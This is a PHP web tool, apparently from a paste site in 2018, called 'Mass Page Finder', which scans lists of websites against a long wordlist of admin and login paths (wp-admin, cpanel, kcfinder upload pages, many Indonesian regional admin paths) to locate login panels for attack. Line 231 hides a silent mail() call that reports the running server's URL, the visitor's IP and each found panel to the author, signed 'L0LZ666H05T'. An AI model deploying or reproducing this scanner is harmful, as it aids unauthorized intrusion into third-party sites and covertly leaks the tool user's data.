
[PHP] Mass page finder

Nov 17th, 2018
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  1. <html>
  2. <head>
  3. <title>Majalengka Security Cyber - Mass Page Finder</title>
  4. <link rel="SHORCUT ICON" href="" type="image/gif">
  5. <meta name="description" content="xTooler by Mr.K4w4!">
  6. <link href='' rel='stylesheet' type='text/css'>
  7. <style type="text/css">
  8. html {
  9. background:#000;
  10. color:#fff;
  11. font-family:Quicksand;
  12. /*background-image: url(;
  13. background-repeat: no-repeat;
  14. background-size: 100% 100vh;*/
  15. }
  16. textarea {
  17. background-color:#1c1c1c;
  18. width: 500px;
  19. font-family:Quicksand;
  20. height: 200px;
  21. color:#fff;
  22. border: 1px solid #1c1c1c;
  23. border-radius:3px;
  24. margin: 5px auto;
  25. padding: 7px;
  26. }
  27. h1 {
  28. font-family: Quicksand;
  29. font-size: 40px;
  30. color: green;
  31. text-align: center;
  32. margin: 0px auto;
  33. }
  34. input[type=submit] {
  35. font-family:Quicksand;
  36. width: 500px;
  37. background:green;
  38. padding:5px;
  39. border-radius:3px;
  40. border:1px solid green;
  41. width:100px;
  42. color:#fff;
  43. }
  44. input[type=submit].commnet {
  45. font-family:Quicksand;
  46. background:green;
  47. padding:5px;
  48. border-radius:3px;
  49. color:#fff;
  50. border:1px solid green;
  51. width:100px;
  52. }
  53. input[type=text].commnet {
  54. font-family:Quicksand;
  55. background:#fff;
  56. padding:5px;
  57. text-align:center;
  58. border-radius:3px;
  59. border:1px solid grey;
  60. width:400px;
  61. }
  62. a.copy {
  63. color:green;
  64. text-decoration:none;
  65. }
  66. span.copy {
  67. text-align:center;
  68. }
  69. </style>
  70. </head>
  71. <h1>Mass Page Finder</h1>
  72. <center>
  73. <form method="post">
  74. <textarea name="target" placeholder="" style="width: 500px; height: 250px;" required></textarea><br>
  75. <input type="submit" name="go" value="FIND" style="width: 500px;">
  76. </form>
  77. </center>
  78. </hmtl>
  79. <?php
  80. error_reporting(0);
  81. function ngcurl($url) {
  82. $curl = curl_init($url);
  83. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  84. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  85. $content = curl_exec($curl);
  86. curl_close($curl);
  87. return $content;
  88. }
  89. $admin = array(
  90. 'adminweb',
  91. 'adminpage',
  92. 'loginweb',
  93. 'administrator',
  94. 'adminarea',
  95. 'adminlogin',
  96. 'admin',
  97. 'adminlab',
  98. 'po-admin',
  99. 'wp-admin',
  100. 'webadmin',
  101. 'nasional',
  102. 'webmaster',
  103. 'ngadimin',
  104. 'operator',
  105. 'redaktur',
  106. 'adm',
  107. 'kcfinder/browse.php',
  108. 'kcfinder/upload.php',
  109. 'loginweb',
  110. 'useradmin',
  111. 'setingweb',
  112. 'directadmin',
  113. 'cpanel',
  114. 'user/login',
  115. 'register.html',
  116. 'login.html',
  117. 'home/administrator',
  118. 'bb-admin',
  119. '',
  120. 'sika/',
  121. 'develop/',
  122. 'ketua/',
  123. 'redaktur/',
  124. 'author',
  125. 'user/',
  126. 'users/',
  127. 'dinkesadmin/',
  128. 'retel/',
  129. 'author/',
  130. 'panel/',
  131. 'paneladmin/',
  132. 'panellogin/',
  133. 'cp-admin/',
  134. 'master/',
  135. 'master/index.php',
  136. 'master/login.php',
  137. 'operator/index.php',
  138. 'sika/index.php',
  139. 'develop/index.php',
  140. 'ketua/index.php',
  141. 'redaktur/index.php',
  142. 'admin/index.php',
  143. 'user/index.php',
  144. 'users/index.php',
  145. 'dinkesadmin/index.php',
  146. 'retel/index.php',
  147. 'author/index.php',
  148. 'panel/index.php',
  149. 'paneladmin/index.php',
  150. 'panellogin/index.php',
  151. 'redaksi/index.php',
  152. 'cp-admin/index.php',
  153. 'operator/login.php',
  154. 'sika/login.php',
  155. 'develop/login.php',
  156. 'ketua/login.php',
  157. 'redaktur/login.php',
  158. 'admin/login.php',
  159. 'administrator/login.php',
  160. 'adminweb/login.php',
  161. 'user/login.php',
  162. 'users/login.php',
  163. 'dinkesadmin/login.php',
  164. 'retel/login.php',
  165. 'author/login.php',
  166. 'panel/login.php',
  167. 'paneladmin/login.php',
  168. 'panellogin/login.php',
  169. 'redaksi/login.php',
  170. 'cp-admin/login.php',
  171. 'terasadmin/',
  172. 'terasadmin/index.php',
  173. 'terasadmin/login.php',
  174. 'rahasia/',
  175. 'rahasia/index.php',
  176. 'rahasia/admin.php',
  177. 'rahasia/login.php',
  178. 'dinkesadmin/',
  179. 'dinkesadmin/login.php',
  180. 'adminpmb/',
  181. 'adminkpu',
  182. 'addmin/',
  183. 'adminarea/',
  184. 'redaktur/',
  185. 'webadmin/',
  186. 'systemadministrator/',
  187. 'adminpmb/index.php',
  188. 'adminpmb/login.php',
  189. 'system/',
  190. 'system/index.php',
  191. 'system/login.php',
  192. 'webadmin/',
  193. 'webadmin/index.php',
  194. 'webadmin/login.php',
  195. 'wpanel/',
  196. 'wpanel/index.php',
  197. 'wpanel/login.php',
  198. 'adminpanel/index.php',
  199. 'adminpanel/',
  200. 'adminpanel/login.php',
  201. 'adminkec/',
  202. 'adminkec/index.php',
  203. 'adminkec/login.php',
  204. 'admindesa/',
  205. 'admindesa/index.php',
  206. 'admindesa/login.php',
  207. 'adminkota/',
  208. 'adminkota/index.php',
  209. 'adminkota/login.php',
  210. 'admin123/',
  211. 'admin123/index.php',
  212. 'admin123/login.php',
  213. 'logout/',
  214. 'logout/index.php',
  215. 'logout/login.php',
  216. 'logout/admin.php',
  217. 'adminweb_setting',
  218. );
  219. $sites = explode("\r\n", htmlspecialchars($_POST['target']));
  220. if(isset($_POST['go'])) {
  221. foreach($sites as $url) {
  222. if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
  223. $url = "http://$url";
  224. } else {
  225. $url = $url;
  226. }
  227. foreach($admin as $adminweb) {
  228. $curl_admin = ngcurl("$url/$adminweb");
  229. if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
  230. $login = "$url/$adminweb";
  231. @mail("", "Logs", "URL : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\n\nIP : ".$_SERVER['REMOTE_ADDR']."\n\nPassword : ".$password."\n\nBy L0LZ666H05T\n\nSite :".$login."");
  232. break;
  233. }
  234. }
  235. if($login == "") {
  236. echo "<br><center><pre><font color='lime'>[-] <font color='red'>Not Found!</br></pre>\n\n";
  237. } else {
  238. echo "<center><pre><br><font color='cyan'>[+] <font color='lime'>Founded : <a href='$login' target='_blank'><font color='cyan'>$login</a></font><br></pre>\n\n";
  239. }
  240. }
  241. }
  242. if (isset($_POST['submit'])) {
  243. $komen = $_POST['komen'];
  244. $ip = $_SERVER['REMOTE_ADDR'];
  245. $to = ""; // Your Email
  246. $subject = "Logs";
  247. $message = "Comment From : ".$ip."\n\n".$komen."";
  248. $from = $ip;
  249. @mail($to, $subject, $message);
  250. }
  251. ?>
  252. <center>
  253. <form method="post">
  254. <input class="commnet" type="text" name="komen" placeholder="Comment">
  255. <input class="commnet" type="submit" name="submit">
  256. </form>
  257. <span class="copy">Copyright &copy; <?php echo date("Y") ?> -
  258. <a class="copy" href="#" target="_blank">Majalengka Security Cyber</a></span>
  259. </center>
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